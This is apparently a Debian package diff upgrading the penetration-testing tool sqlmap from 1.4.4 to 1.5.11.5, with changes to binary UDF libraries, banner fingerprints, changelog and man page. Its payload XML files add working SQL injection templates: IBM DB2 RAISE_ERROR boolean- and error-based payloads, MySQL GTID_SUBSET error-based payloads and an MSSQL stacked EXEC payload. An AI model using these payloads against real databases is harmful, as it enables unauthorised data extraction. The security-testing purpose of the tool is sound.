/tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ differ diff -Nru sqlmap-1.4.4/data/xml/banner/generic.xml sqlmap-1.5.11.5/data/xml/banner/generic.xml --- sqlmap-1.4.4/data/xml/banner/generic.xml 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/xml/banner/generic.xml 2021-11-12 18:30:56.000000000 +0000 @@ -34,7 +34,7 @@ - + @@ -151,7 +151,7 @@ - + diff -Nru sqlmap-1.4.4/data/xml/banner/mysql.xml sqlmap-1.5.11.5/data/xml/banner/mysql.xml --- sqlmap-1.4.4/data/xml/banner/mysql.xml 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/xml/banner/mysql.xml 2021-11-12 18:30:56.000000000 +0000 @@ -64,6 +64,10 @@ + + + + diff -Nru sqlmap-1.4.4/data/xml/banner/server.xml sqlmap-1.5.11.5/data/xml/banner/server.xml --- sqlmap-1.4.4/data/xml/banner/server.xml 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/xml/banner/server.xml 2021-11-12 18:30:56.000000000 +0000 @@ -10,7 +10,7 @@ - + @@ -74,23 +74,27 @@ - + - + - + - + - + + + + + @@ -131,36 +135,36 @@ - - - - - - - - - + - + - + - + - + - + + + + + + + + + @@ -293,6 +297,35 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + @@ -407,6 +440,14 @@ + + + + + + + + @@ -587,6 +628,10 @@ + + + + @@ -714,6 +759,14 @@ + + + + + + + + @@ -800,6 +853,22 @@ + + + + + + + + + + + + + + + + diff -Nru sqlmap-1.4.4/data/xml/banner/x-powered-by.xml sqlmap-1.5.11.5/data/xml/banner/x-powered-by.xml --- sqlmap-1.4.4/data/xml/banner/x-powered-by.xml 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/xml/banner/x-powered-by.xml 2021-11-12 18:30:56.000000000 +0000 @@ -19,6 +19,22 @@ + + + + + + + + + + + + + + + + diff -Nru sqlmap-1.4.4/data/xml/boundaries.xml sqlmap-1.5.11.5/data/xml/boundaries.xml --- sqlmap-1.4.4/data/xml/boundaries.xml 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/xml/boundaries.xml 2021-11-12 18:30:56.000000000 +0000 @@ -218,6 +218,15 @@ 1 1,2 3 + %' + AND '[RANDSTR]%'='[RANDSTR] + + + + 2 + 1 + 1,2 + 3 ' AND '[RANDSTR]' LIKE '[RANDSTR] diff -Nru sqlmap-1.4.4/data/xml/errors.xml sqlmap-1.5.11.5/data/xml/errors.xml --- sqlmap-1.4.4/data/xml/errors.xml 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/xml/errors.xml 2021-11-12 18:30:56.000000000 +0000 @@ -42,7 +42,7 @@ - + @@ -55,6 +55,7 @@ + @@ -83,7 +84,7 @@ - + @@ -217,4 +218,17 @@ + + + + + + + + + + + + + diff -Nru sqlmap-1.4.4/data/xml/payloads/boolean_blind.xml sqlmap-1.5.11.5/data/xml/payloads/boolean_blind.xml --- sqlmap-1.4.4/data/xml/payloads/boolean_blind.xml 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/xml/payloads/boolean_blind.xml 2021-11-12 18:30:56.000000000 +0000 @@ -824,7 +824,6 @@
Microsoft SQL Server Sybase - Windows
@@ -845,7 +844,6 @@
Microsoft SQL Server Sybase - Windows
@@ -1193,7 +1191,6 @@
Microsoft SQL Server Sybase - Windows
@@ -1214,7 +1211,6 @@
Microsoft SQL Server Sybase - Windows
@@ -1332,6 +1328,44 @@ + + IBM DB2 boolean-based blind - ORDER BY clause + 1 + 4 + 1 + 3 + 1 + ,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + + ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + + + ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + +
+ IBM DB2 +
+
+ + + IBM DB2 boolean-based blind - ORDER BY clause (original value) + 1 + 5 + 1 + 3 + 1 + ,(SELECT CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + + ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + + + ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + +
+ IBM DB2 +
+
+ HAVING boolean-based blind - WHERE, GROUP BY clause @@ -1452,7 +1486,6 @@
Microsoft SQL Server Sybase - Windows
@@ -1474,7 +1507,6 @@
Microsoft SQL Server Sybase - Windows
diff -Nru sqlmap-1.4.4/data/xml/payloads/error_based.xml sqlmap-1.5.11.5/data/xml/payloads/error_based.xml --- sqlmap-1.4.4/data/xml/payloads/error_based.xml 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/xml/payloads/error_based.xml 2021-11-12 18:30:56.000000000 +0000 @@ -92,6 +92,46 @@ + MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) + 2 + 4 + 1 + 1,2,3,8,9 + 1 + AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM]) + + AND GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.6 +
+
+ + + MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET) + 2 + 4 + 3 + 1,8,9 + 1 + OR GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM]) + + OR GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.6 +
+
+ + MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS) 2 5 @@ -135,7 +175,7 @@ MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) 2 - 1 + 2 1 1,2,3,8,9 1 @@ -159,7 +199,7 @@ MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) 2 - 1 + 2 3 1,2,3,8,9 @@ -184,7 +224,7 @@ MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) 2 - 2 + 1 1 1,2,3,8,9 1 @@ -208,7 +248,7 @@ MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) 2 - 2 + 1 3 1,2,3,8,9 @@ -282,7 +322,7 @@ MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) 2 - 2 + 3 1 1,2,3,8,9 1 @@ -307,7 +347,7 @@ MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR) 2 - 2 + 3 3 1,8,9 1 @@ -332,7 +372,7 @@ MySQL OR error-based - WHERE or HAVING clause (FLOOR) 2 - 3 + 4 3 1,8,9 2 @@ -404,7 +444,6 @@
Microsoft SQL Server Sybase - Windows
@@ -425,7 +464,6 @@
Microsoft SQL Server Sybase - Windows
@@ -446,7 +484,6 @@
Microsoft SQL Server Sybase - Windows
@@ -467,7 +504,6 @@
Microsoft SQL Server Sybase - Windows
@@ -488,7 +524,6 @@
Microsoft SQL Server Sybase - Windows
@@ -509,7 +544,6 @@
Microsoft SQL Server Sybase - Windows
@@ -672,7 +706,7 @@ 2 3 1 - 1,9 + 1 1 AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') @@ -689,9 +723,9 @@ Firebird OR error-based - WHERE or HAVING clause 2 - 3 + 4 3 - 1,9 + 1 2 OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') @@ -710,7 +744,7 @@ 2 3 1 - 1,9 + 1 1 AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') @@ -727,9 +761,9 @@ MonetDB OR error-based - WHERE or HAVING clause 2 - 3 + 4 3 - 1,9 + 1 2 OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') @@ -748,7 +782,7 @@ 2 3 1 - 1,8,9 + 1 1 AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC) @@ -765,9 +799,9 @@ Vertica OR error-based - WHERE or HAVING clause 2 - 3 + 4 3 - 1,8,9 + 1 2 OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC) @@ -780,6 +814,45 @@ Vertica + + + IBM DB2 AND error-based - WHERE or HAVING clause + 2 + 3 + 1 + 1 + 1 + AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ IBM DB2 +
+
+ + + IBM DB2 OR error-based - WHERE or HAVING clause + 2 + 4 + 1 + 1 + 1 + OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ IBM DB2 +
+
+ @@ -1106,6 +1216,26 @@
+ MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET) + 2 + 5 + 1 + 2,3 + 1 + ,GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM]) + + ,GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.6 +
+
+ + MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS) 2 5 @@ -1128,7 +1258,7 @@ MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR) 2 - 3 + 4 1 2,3 1 @@ -1148,7 +1278,7 @@ MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE) 2 - 4 + 3 1 2,3 1 @@ -1188,7 +1318,7 @@ MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR) 2 - 2 + 3 1 2,3 1 @@ -1205,7 +1335,6 @@ - PostgreSQL error-based - ORDER BY, GROUP BY clause 2 @@ -1261,7 +1390,6 @@
Microsoft SQL Server Sybase - Windows
@@ -1289,7 +1417,7 @@ 2 5 1 - 2,3 + 3 1 ,(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')) @@ -1302,9 +1430,51 @@ Firebird
+ + + IBM DB2 error-based - ORDER BY clause + 2 + 5 + 1 + 3 + 1 + ,RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + ,RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ IBM DB2 +
+
+ + + + Microsoft SQL Server/Sybase error-based - Stacking (EXEC) + 2 + 2 + 1 + 1-8 + 1 + ;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]');EXEC @[RANDSTR] + + ;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]');EXEC @[RANDSTR] + -- + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ diff -Nru sqlmap-1.4.4/data/xml/payloads/inline_query.xml sqlmap-1.5.11.5/data/xml/payloads/inline_query.xml --- sqlmap-1.4.4/data/xml/payloads/inline_query.xml 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/xml/payloads/inline_query.xml 2021-11-12 18:30:56.000000000 +0000 @@ -73,7 +73,6 @@
Microsoft SQL Server Sybase - Windows
diff -Nru sqlmap-1.4.4/data/xml/payloads/stacked_queries.xml sqlmap-1.5.11.5/data/xml/payloads/stacked_queries.xml --- sqlmap-1.4.4/data/xml/payloads/stacked_queries.xml 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/xml/payloads/stacked_queries.xml 2021-11-12 18:30:56.000000000 +0000 @@ -264,7 +264,6 @@
Microsoft SQL Server Sybase - Windows
@@ -286,7 +285,6 @@
Microsoft SQL Server Sybase - Windows
@@ -307,7 +305,6 @@
Microsoft SQL Server Sybase - Windows
@@ -328,7 +325,6 @@
Microsoft SQL Server Sybase - Windows
diff -Nru sqlmap-1.4.4/data/xml/payloads/time_blind.xml sqlmap-1.5.11.5/data/xml/payloads/time_blind.xml --- sqlmap-1.4.4/data/xml/payloads/time_blind.xml 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/xml/payloads/time_blind.xml 2021-11-12 18:30:56.000000000 +0000 @@ -588,7 +588,6 @@
Microsoft SQL Server Sybase - Windows
@@ -610,7 +609,6 @@
Microsoft SQL Server Sybase - Windows
@@ -631,7 +629,6 @@
Microsoft SQL Server Sybase - Windows
@@ -652,7 +649,6 @@
Microsoft SQL Server Sybase - Windows
@@ -674,7 +670,6 @@
Microsoft SQL Server Sybase - Windows
@@ -696,7 +691,6 @@
Microsoft SQL Server Sybase - Windows
@@ -1638,7 +1632,6 @@
Microsoft SQL Server Sybase - Windows
@@ -1936,7 +1929,6 @@
Microsoft SQL Server Sybase - Windows
diff -Nru sqlmap-1.4.4/data/xml/queries.xml sqlmap-1.5.11.5/data/xml/queries.xml --- sqlmap-1.4.4/data/xml/queries.xml 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/xml/queries.xml 2021-11-12 18:30:56.000000000 +0000 @@ -127,12 +127,12 @@ - - + + - - + + @@ -147,8 +147,8 @@ - - + + @@ -198,11 +198,11 @@ - + - + @@ -301,8 +301,8 @@ - - + + @@ -357,7 +357,7 @@ - + @@ -1209,7 +1209,7 @@ - + @@ -1370,8 +1370,8 @@ - - + + @@ -1386,8 +1386,8 @@ - - + + @@ -1626,4 +1626,94 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff -Nru sqlmap-1.4.4/debian/changelog sqlmap-1.5.11.5/debian/changelog --- sqlmap-1.4.4/debian/changelog 2020-04-13 09:21:13.000000000 +0000 +++ sqlmap-1.5.11.5/debian/changelog 2021-11-12 18:29:28.000000000 +0000 @@ -1,3 +1,137 @@ +sqlmap (1.5.11.5-1~simonarons) focal; urgency=medium + + * Kind of new upstream relase? + * Fixed man pages. Really proud, to be honest. First time. + + -- Simon Arons Fri, 12 Nov 2021 18:29:28 +0000 + +sqlmap (1.5.11-1) unstable; urgency=medium + + * New upstream version 1.5.11 + + -- Gianfranco Costamagna Wed, 03 Nov 2021 08:55:02 +0100 + +sqlmap (1.5.10-1) unstable; urgency=medium + + * New upstream version 1.5.10 + * Update sqlmap website + * Update sqlmap.org website protocol to https + * Bump std-version to 4.6.0 + + -- Gianfranco Costamagna Tue, 05 Oct 2021 15:56:37 +0200 + +sqlmap (1.5.9-1) unstable; urgency=medium + + * New upstream version 1.5.9 + + -- Gianfranco Costamagna Tue, 07 Sep 2021 10:27:16 +0200 + +sqlmap (1.5.8-1) unstable; urgency=medium + + * New upstream version 1.5.8 + + -- Gianfranco Costamagna Mon, 16 Aug 2021 11:48:16 +0200 + +sqlmap (1.5.7-1) unstable; urgency=medium + + * New upstream version 1.5.7 + + -- Gianfranco Costamagna Thu, 08 Jul 2021 17:30:07 +0200 + +sqlmap (1.5.6-1) unstable; urgency=medium + + * New upstream version 1.5.6 + + -- Gianfranco Costamagna Tue, 08 Jun 2021 16:09:46 +0200 + +sqlmap (1.5.5-1) unstable; urgency=medium + + * New upstream version 1.5.5 + + -- Gianfranco Costamagna Tue, 11 May 2021 19:07:31 +0200 + +sqlmap (1.5.4-1) unstable; urgency=medium + + * New upstream version 1.5.4 + * Drop old and unused licenses from copyright file + + -- Gianfranco Costamagna Sat, 03 Apr 2021 17:02:45 +0200 + +sqlmap (1.5.3-1) unstable; urgency=medium + + * New upstream version 1.5.3 + + -- Gianfranco Costamagna Sat, 06 Mar 2021 08:03:04 +0100 + +sqlmap (1.5.2-1) unstable; urgency=medium + + * New upstream version 1.5.2 + + -- Gianfranco Costamagna Tue, 02 Feb 2021 14:28:42 +0100 + +sqlmap (1.5-1) unstable; urgency=medium + + * New upstream version 1.5 + * Update copyright years + + -- Gianfranco Costamagna Mon, 04 Jan 2021 23:56:46 +0100 + +sqlmap (1.4.12-1) unstable; urgency=medium + + * New upstream version 1.4.12 + + -- Gianfranco Costamagna Tue, 01 Dec 2020 17:02:48 +0100 + +sqlmap (1.4.11-1) unstable; urgency=medium + + * New upstream version 1.4.11 + + -- Gianfranco Costamagna Tue, 03 Nov 2020 12:04:11 +0100 + +sqlmap (1.4.10-1) unstable; urgency=medium + + * New upstream version 1.4.10 + + -- Gianfranco Costamagna Mon, 05 Oct 2020 15:43:38 +0200 + +sqlmap (1.4.9-1) unstable; urgency=medium + + * New upstream version 1.4.9 + + -- Gianfranco Costamagna Fri, 04 Sep 2020 09:18:24 +0200 + +sqlmap (1.4.8-1) unstable; urgency=medium + + [ Debian Janitor ] + * Set upstream metadata fields: Bug-Database, Bug-Submit, + Repository, Repository-Browse. + + [ Gianfranco Costamagna ] + * New upstream version 1.4.8 + * Refresh manpages + + -- Gianfranco Costamagna Mon, 10 Aug 2020 07:49:59 +0200 + +sqlmap (1.4.7-1) unstable; urgency=medium + + * New upstream version 1.4.7 + + -- Gianfranco Costamagna Fri, 03 Jul 2020 06:58:13 +0200 + +sqlmap (1.4.6-1) unstable; urgency=medium + + * Add overrides for some lintian issues + * New upstream version 1.4.6 + + -- Gianfranco Costamagna Mon, 01 Jun 2020 12:19:23 +0200 + +sqlmap (1.4.5-1) unstable; urgency=medium + + * Add R^3: no + * New upstream version 1.4.5 + + -- Gianfranco Costamagna Mon, 04 May 2020 22:54:33 +0200 + sqlmap (1.4.4-1) unstable; urgency=medium [ Samuel Henrique ] diff -Nru sqlmap-1.4.4/debian/control sqlmap-1.5.11.5/debian/control --- sqlmap-1.4.4/debian/control 2020-02-05 08:24:31.000000000 +0000 +++ sqlmap-1.5.11.5/debian/control 2021-10-05 13:56:28.000000000 +0000 @@ -4,10 +4,11 @@ Maintainer: Debian Security Tools Uploaders: Luciano Bello , Gianfranco Costamagna Build-Depends: debhelper-compat (= 12), dh-python, python3-all -Standards-Version: 4.5.0 -Homepage: http://sqlmap.org/ +Standards-Version: 4.6.0 +Homepage: https://sqlmap.org/ Vcs-Git: https://salsa.debian.org/pkg-security-team/sqlmap.git Vcs-Browser: https://salsa.debian.org/pkg-security-team/sqlmap +Rules-Requires-Root: no Package: sqlmap Architecture: all diff -Nru sqlmap-1.4.4/debian/copyright sqlmap-1.5.11.5/debian/copyright --- sqlmap-1.4.4/debian/copyright 2020-01-02 09:15:05.000000000 +0000 +++ sqlmap-1.5.11.5/debian/copyright 2021-10-05 13:55:45.000000000 +0000 @@ -1,11 +1,11 @@ Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/ Upstream-Name: sqlmap -Source: http://sqlmap.sourceforge.net/ +Source: https://sqlmap.org/ Files: * -Copyright: 2006-2020 sqlmap developers (http://sqlmap.org/) - 2006-2020 Bernardo Damele Assumpcao Guimaraes (@inquisb) - 2006-2020 Miroslav Stampar (@stamparm) +Copyright: 2006-2021 sqlmap developers (http://sqlmap.org/) + 2006-2021 Bernardo Damele Assumpcao Guimaraes (@inquisb) + 2006-2021 Miroslav Stampar (@stamparm) License: GPL-2+-custom This program is free software; you may redistribute and/or modify it under the terms of the GNU General Public License as published by the Free @@ -230,54 +230,6 @@ Mark Pilgrim (port to Python) License: LGPL-2.1+ -Files: thirdparty/xdot/* - thirdparty/gprof2dot/* -Copyright: 2008-2009 Jose Fonseca - 2002 Cynthia Brewer - 2002 Mark Harrower - 2002 The Pennsylvania State, University (part of the xdot file) -License: LGPL-3+ -Comment: some subparts of the xdot.py file are licensed as: - Apache-Style Software License for ColorBrewer software and ColorBrewer Color - Schemes, Version 1.1 - . - Copyright (c) 2002 Cynthia Brewer, Mark Harrower, and The Pennsylvania State - University. All rights reserved. - . - Redistribution and use in source and binary forms, with or without - modification, are permitted provided that the following conditions are met: - . - 1. Redistributions as source code must retain the above copyright notice, - this list of conditions and the following disclaimer. - . - 2. The end-user documentation included with the redistribution, if any, - must include the following acknowledgment: - . - This product includes color specifications and designs developed by - Cynthia Brewer (http://colorbrewer.org/). - . - Alternately, this acknowledgment may appear in the software itself, if and - wherever such third-party acknowledgments normally appear. - . - 3. The name "ColorBrewer" must not be used to endorse or promote products - derived from this software without prior written permission. For written - permission, please contact Cynthia Brewer at cbrewer@psu.edu. - . - 4. Products derived from this software may not be called "ColorBrewer", - nor may "ColorBrewer" appear in their name, without prior written - permission of Cynthia Brewer. - . - THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESSED OR IMPLIED WARRANTIES, - INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND - FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CYNTHIA - BREWER, MARK HARROWER, OR THE PENNSYLVANIA STATE UNIVERSITY BE LIABLE FOR ANY - DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES - (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; - LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND - ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT - (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS - SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - Files: thirdparty/bottle/* Copyright: 2012 Marcel Hellkamp License: MIT @@ -302,7 +254,7 @@ Files: debian/* Copyright: 2009 Bernardo Damele A. G. 2014-2015 Luciano Bello - 2014-2020 Gianfranco Costamagna + 2014-2021 Gianfranco Costamagna License: GPL-2+ Files: debian/missing-sources/udfhack/* diff -Nru sqlmap-1.4.4/debian/man/sqlmap.1 sqlmap-1.5.11.5/debian/man/sqlmap.1 --- sqlmap-1.4.4/debian/man/sqlmap.1 2019-01-15 08:58:40.000000000 +0000 +++ sqlmap-1.5.11.5/debian/man/sqlmap.1 2021-11-12 18:29:28.000000000 +0000 @@ -1,10 +1,23 @@ -.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.47.2. -.TH SQLMAP "1" "December 2015" "sqlmap.py v0.9" "User Commands" +.TH SQLMAP "1" "November 2021" "sqlmap 1.5.11.5" "User Commands" .SH NAME sqlmap \- automatic SQL injection tool .SH SYNOPSIS -.B python -\fI\,sqlmap \/\fR[\fI\,options\/\fR] +.B sqlmap +\/\fR[\fI\,options\/\fR] +.SH DESCRIPTION +.PP + ___ +.br + __H__ +.br + ___ ___[.]_____ ___ ___ {1.5.11.5} +.br +|_ -| . [.] | .'| . | +.br +|___|_ [,]_|_|_|__,| _| +.br + |_|V... |_| https://sqlmap.org +.br .SH OPTIONS 